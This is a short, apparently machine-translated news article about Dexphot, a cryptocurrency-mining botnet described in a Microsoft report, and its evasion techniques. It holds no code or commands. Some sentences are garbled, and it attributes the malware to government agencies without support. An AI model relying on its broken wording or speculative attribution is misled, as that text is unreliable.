The antivirus and malware division of Microsoft has drawn the attention of the cybersecurity sector to the threat represented by a botnet of crypto currency mined that have detected up to 80,000 computers worldwide during its peak, during last June.
The existence of this malware, apparently created in October 2018 and named Dexphot, has been revealed by Microsoft engineers in a report published yesterday on their website, which details the operation of this new cyberthreat.
In order to go unnoticed inside infected systems, Dexphot makes use of polymorphic techniques, file-less execution technology and intelligent boot persistence mechanisms.
In addition, this malware is not self-replicating to infect new computers, but reaches these hosted in a second malware called ICLoader, which is integrated into other software classes, such as ‘pirated’ programs.
The only part of ICLoader that ever gets written to the disk of the attacked computer is the Dexphot installation file itself, and even Dexphot does it for a very short period of time.
It is then hidden by taking advantage of legitimate system processes (such as Windows operating system to run malware, making use of necessary programs such as), all of which make it difficult to detect using classic antivirus software.
But Dexphot’s main concealment technique is called polymorphism, which allows it to go unnoticed by changing both the URLs and the filenames it uses within 20-30 minutes; a detail that makes it easy for any surviving trace of this malware to lead to reinfection.
This sophistication points to a link between this malware and government cybersecurity agencies, which would resort to the mining of the Monero crypto currency as a means of financing, since its emphasis on privacy prevents the reconstruction of the movements of the funds generated.